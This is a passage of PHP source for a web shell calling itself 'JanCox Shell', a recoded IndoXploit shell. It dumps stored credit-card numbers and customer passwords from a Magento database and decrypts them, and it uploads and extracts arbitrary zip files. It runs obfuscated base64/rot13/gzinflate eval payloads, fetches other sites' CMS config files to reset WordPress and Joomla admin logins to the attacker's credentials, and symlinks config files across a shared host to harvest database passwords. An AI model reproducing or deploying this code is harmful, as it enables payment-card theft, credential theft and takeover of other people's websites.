781. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
782. $batas = $no++;
783. }
784.  
785. while($vx2 = mysql_fetch_array($query2)){
786. $batas +=1;
787. $cc_owner = $vx2['cc_owner'];
788. $method = $vx2['method'];
789. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
790. $exp = $vx2['exp'];
791. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
792. $Billing_Address = $vx2['Billing Address'];
793. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
794. $batas++;
795. }
796.  
797. echo "</table><br>";
798. }
799. //=========================================================================================================
800. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
801. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
802.  
803.  
804. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
805. if (!$query){
806. echo "<center><b>Gagal</b></center>";
807. }else{
808. echo'<br><br>
809. ====================================================================<br>
810. [ Customer ] <br>
811. ====================================================================<br>';
812. }
813. echo "
814. <table border='1' align='center' >
815. <tr>
816. <td>no</td>
817. <td>user</td>
818. <td>pass</td>
819. </tr>";
820. $no = 1;
821. $batas = 0;
822. while($vx = mysql_fetch_array($query)) {
823. $user = $vx['email'];
824. $pass = $vx['value'];
825. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
826. $batas = $no++;
827. }
828.  
829. if(mysql_num_rows($query2) != 0 && ($query2)){
830. while($vx2 = mysql_fetch_array($query2)){
831. $user = $vx2['customer_email'];
832. $pass = $crypto->decrypt($vx2['password_hash']);
833. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
834. $batas +=1;
835. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
836. $batas++;
837. }
838. }
839. }
840.  
841. echo "</table><br>";
842. }
843. //=========================================================================================================
844. }
845. }
846. function save($format,$data){
847. $fp = fopen($format, 'a');
848. fwrite($fp, $data);
849. fclose($fp);
850. }
851. function cekbase64($string){
852. $decoded = base64_decode($string, true);
853. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
854. if(!base64_decode($string, true)) return false;
855. if(base64_encode($decoded) != $string) return false;
856. return true;//nilai return 1 jika true
857. }
858. //----untuk decode password ---/
859. class Varien_Crypt_Mcrypt{
860. /**
861. * Constuctor
862. *
863. * @param array $data
864. */
865. public function __construct()
866. {
867. }
868.  
869. /**
870. * Initialize mcrypt module
871. *
872. * @param string $key cipher private key
873. * @return Varien_Crypt_Mcrypt
874. */
875. public function init($key)
876. {
877. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
878. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
879. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
880.  
881. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
882. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
883. return null;
884. }
885.  
886. mcrypt_generic_init($this->handler, $key, $iv);
887.  
888. return $this;
889. }
890.  
891. /**
892. * Encrypt data
893. *
894. * @param string $data source string
895. * @return string
896. */
897. public function encrypt($data)
898. {
899. if (!$this->handler) {
900. //throw new Varien_Exception('Crypt module is not initialized.');
901. return null;
902. }
903. if (strlen($data) == 0) {
904. return $data;
905. }
906. return base64_encode(mcrypt_generic($this->handler, $data));
907. }
908.  
909. /**
910. * Decrypt data
911. *
912. * @param string $data encrypted string
913. * @return string
914. */
915. public function decrypt($data)
916. {
917. if (!$this->handler) {
918. //throw new Varien_Exception('Crypt module is not initialized.');
919. return null;
920. }
921. if (strlen($data) == 0) {
922. return $data;
923. }
924. return mdecrypt_generic($this->handler, base64_decode($data));
925. }
926.  
927.  
928. /**
929. * Desctruct cipher module
930. *
931. */
932. public function __destruct()
933. {
934. if ($this->handler) {
935. $this->_reset();
936. }
937. }
938.  
939. protected function _reset()
940. {
941. mcrypt_generic_deinit($this->handler);
942. mcrypt_module_close($this->handler);
943. }
944. }
945. }
946. elseif($_GET['do'] == 'zip') {
947. echo "<center><h1>Zip Menu</h1>";
948. function rmdir_recursive($dir) {
949. foreach(scandir($dir) as $file) {
950. if ('.' === $file || '..' === $file) continue;
951. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
952. else unlink("$dir/$file");
953. }
954. rmdir($dir);
955. }
956. if($_FILES["zip_file"]["name"]) {
957. $filename = $_FILES["zip_file"]["name"];
958. $source = $_FILES["zip_file"]["tmp_name"];
959. $type = $_FILES["zip_file"]["type"];
960. $name = explode(".", $filename);
961. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
962. foreach($accepted_types as $mime_type) {
963. if($mime_type == $type) {
964. $okay = true;
965. break;
966. }
967. }
968. $continue = strtolower($name[1]) == 'zip' ? true : false;
969. if(!$continue) {
970. $message = "Itu Bukan Zip , , GOBLOK COK";
971. }
972. $path = dirname(__FILE__).'/';
973. $filenoext = basename ($filename, '.zip');
974. $filenoext = basename ($filenoext, '.ZIP');
975. $targetdir = $path . $filenoext;
976. $targetzip = $path . $filename;
977. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
978. mkdir($targetdir, 0777);
979. if(move_uploaded_file($source, $targetzip)) {
980. $zip = new ZipArchive();
981. $x = $zip->open($targetzip);
982. if ($x === true) {
983. $zip->extractTo($targetdir);
984. $zip->close();
985.  
986. unlink($targetzip);
987. }
988. $message = "<b>Sukses Gan :)</b>";
989. } else {
990. $message = "<b>Error Gan :(</b>";
991. }
992. }
993. echo '<table style="width:100%" border="1">
994. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
995. <label>Zip File : <input type="file" name="zip_file" /></label>
996. <input type="submit" name="submit" value="Upload And Unzip" />
997. </form>';
998. if($message) echo "<p>$message</p>";
999. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
1000. if($_POST['backup']){
1001. $save=$_POST['save'];
1002. function Zip($source, $destination)
1003. {
1004. if (extension_loaded('zip') === true)
1005. {
1006. if (file_exists($source) === true)
1007. {
1008. $zip = new ZipArchive();
1009.  
1010. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
1011. {
1012. $source = realpath($source);
1013.  
1014. if (is_dir($source) === true)
1015. {
1016. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
1017.  
1018. foreach ($files as $file)
1019. {
1020. $file = realpath($file);
1021.  
1022. if (is_dir($file) === true)
1023. {
1024. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
1025. }
1026.  
1027. else if (is_file($file) === true)
1028. {
1029. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
1030. }
1031. }
1032. }
1033.  
1034. else if (is_file($source) === true)
1035. {
1036. $zip->addFromString(basename($source), file_get_contents($source));
1037. }
1038. }
1039.  
1040. return $zip->close();
1041. }
1042. }
1043.  
1044. return false;
1045. }
1046. Zip($_POST['dir'],$save);
1047. echo "Done , Save To <b>$save</b>";
1048. }
1049. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
1050. if($_POST['extrak']){
1051. $save=$_POST['save'];
1052. $zip = new ZipArchive;
1053. $res = $zip->open($_POST['dir']);
1054. if ($res === TRUE) {
1055. $zip->extractTo($save);
1056. $zip->close();
1057. echo 'Succes , Location : <b>'.$save.'</b>';
1058. } else {
1059. echo 'Gagal Mas :( Ntahlah !';
1060. }
1061. }
1062. echo '</tr></table>';
1063. }
1064. elseif($_GET['do'] == 'shellchk') {
1065. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
1066. } elseif($_GET['do'] == 'loghunter')
1067. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
1068. elseif($_GET['do'] == 'metu') {
1069.  
1070.  
1071. echo '<form action="?dir=$dir&do=metu" method="post">';
1072. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1073. echo 'Byee !';
1074.  
1075. }
1076. elseif($_GET['do'] == 'about') {
1077.  
1078. echo '<center>JanCox Shell<hr>IndoXploit Shell Recoded By 0x1999<br>For More Script Visit <a href="http://cr1p.blogspot.com/">Here</a>';
1079.  
1080. }
1081. elseif($_GET['do'] == 'auto_cu_wp') {
1082. if($_POST['gass']) {
1083. echo "<center><h1>WordPress Auto Change User 2</h1>
1084. <form method='post'>
1085. Link Config: <br>
1086. <textarea name='link' style='width: 450px; height:250px;'>";
1087. UrlLoop($_POST['linkconf'],'wordpress');
1088. echo"</textarea><br>
1089. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
1090. </form></center>";
1091. } else {
1092. echo "<center><h1>WordPress Auto Change User 2</h1>
1093. <form method='post'>
1094. Link Config: <br>
1095. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
1096. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1097. </form></center>";
1098. }
1099. if($_POST['auto_cu_wp']) {
1100.  
1101. function anucurl($sites) {
1102. $ch = curl_init($sites);
1103. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1104. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1105. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1106. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1107. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1108. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1109. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1110. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1111. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1112. $data = curl_exec($ch);
1113. curl_close($ch);
1114. return $data;
1115. }
1116. $link = explode("\r\n", $_POST['link']);
1117. $user = "0x1999";
1118. $pass = "0x1999";
1119. $passx = md5($pass);
1120. foreach($link as $dir_config) {
1121. $config = anucurl($dir_config);
1122. $dbhost = ambilkata($config,"DB_HOST', '","'");
1123. $dbuser = ambilkata($config,"DB_USER', '","'");
1124. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1125. $dbname = ambilkata($config,"DB_NAME', '","'");
1126. $dbprefix = ambilkata($config,"table_prefix = '","'");
1127. $prefix = $dbprefix."users";
1128. $option = $dbprefix."options";
1129. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1130. $db = mysql_select_db($dbname);
1131. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1132. $result = mysql_fetch_array($q);
1133. $id = $result[ID];
1134. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1135. $result2 = mysql_fetch_array($q2);
1136. $target = $result2[option_value];
1137. if($target == '') {
1138. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1139. } else {
1140. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
1141. }
1142. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1143. if(!$conn OR !$db OR !$update) {
1144. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1145. mysql_close($conn);
1146. } else {
1147. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1148. echo "[+] username: <font color=lime>$user</font><br>";
1149. echo "[+] password: <font color=lime>$pass</font><br><br>";
1150.  
1151. mysql_close($conn);
1152. }
1153. }
1154. }
1155.  
1156. }
1157. elseif($_GET['do'] == 'auto_cu_joomla') {
1158. if($_POST['gass']) {
1159. echo "<center><h1>Joomla Auto Change User 2</h1>
1160. <form method='post'>
1161. Link Config: <br>
1162. <textarea name='link' style='width: 450px; height:250px;'>";
1163. UrlLoop($_POST['linkconf'],'joomla');
1164. echo"</textarea><br>
1165. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
1166. </form></center>";
1167. } else {
1168. echo "<center><h1>Joomla Auto Change User 2</h1>
1169. <form method='post'>
1170. Link Config: <br>
1171. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
1172. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1173. </form></center>";
1174. }
1175. if($_POST['auto_cu_joomla']) {
1176.  
1177. function anucurl($sites) {
1178. $ch = curl_init($sites);
1179. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1180. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1181. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1182. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1183. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1184. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1185. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1186. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1187. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1188. $data = curl_exec($ch);
1189. curl_close($ch);
1190. return $data;
1191. }
1192. $link = explode("\r\n", $_POST['link']);
1193. $user = "0x1999";
1194. $pass = "0x1999";
1195. $passx = md5($pass);
1196. foreach($link as $dir_config) {
1197. $config = anucurl($dir_config);
1198. $dbhost = ambilkata($config,"host = '","'");
1199. $dbuser = ambilkata($config,"user = '","'");
1200. $dbpass = ambilkata($config,"password = '","'");
1201. $dbname = ambilkata($config,"db = '","'");
1202. $dbprefix = ambilkata($config,"dbprefix = '","'");
1203. $prefix = $dbprefix."users";
1204. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1205. $db = mysql_select_db($dbname);
1206. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1207. $result = mysql_fetch_array($q);
1208. $id = $result['id'];
1209. $site = ambilkata($config,"sitename = '","'");
1210. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
1211. echo "Config => ".$dir_config."<br>";
1212. echo "CMS => Joomla<br>";
1213. if($site == '') {
1214. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1215. } else {
1216. echo "Sitename => $site<br>";
1217. }
1218. if(!$update OR !$conn OR !$db) {
1219. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1220. } else {
1221. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
1222. }
1223. mysql_close($conn);
1224. }
1225. }
1226. }
1227. elseif($_GET['do'] == 'symconfig') {
1228. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
1229. echo '<script>alert("Skid this won\'t work on Windows")</script>';
1230. exit;
1231. }
1232. else
1233. {
1234. if($_POST["m"] && !$_POST["passwd"]==""){
1235. @mkdir("cox_symconf", 0777);
1236. @chdir("cox_symconf");
1237. @symlink("/","root");
1238. $htaccess="Options Indexes FollowSymLinks
1239. DirectoryIndex jancox.htm
1240. AddType text/plain .php
1241. AddHandler text/plain .php
1242. Satisfy Any";
1243. @file_put_contents(".htaccess",$htaccess);
1244. $etc_passwd=$_POST["passwd"];
1245. $etc_passwd=explode("\n",$etc_passwd);
1246. foreach($etc_passwd as $passwd){
1247. $pawd=explode(":",$passwd);
1248. $user =$pawd[0];
1249.  
1250. @symlink('/','cox_symconf/root');
1251. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1252. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1253. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1254. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1255. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1256. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1257. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1258. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1259. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1260. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1261. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1262. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1263. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1264. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1265. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1266. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1267. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
1268. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
1269. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
1270. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1271. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1272. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1273. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1274. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1275. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1276. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1277. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1278. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1279. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1280. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1281. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1282. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1283. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1284. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1285. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1286. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1287. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1288. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1289. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1290. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1291. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1292. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1293. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1294. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1295. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1296. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1297. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1298. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1299. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1300. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1301. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1302. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1303. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1304. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1305. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1306. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1307. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1308. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1309. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
1310. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
1311. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
1312. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
1313. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
1314. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
1315. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
1316. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
1317. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
1318. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
1319. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
1320. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
1321. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
1322. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
1323. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
1324. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
1325. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
1326. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
1327. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
1328. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
1329. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
1330. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
1331. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
1332. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
1333. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
1334. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
1335. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
1336. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
1337. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
1338. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
1339. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
1340. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
1341. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
1342. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
1343. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
1344. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
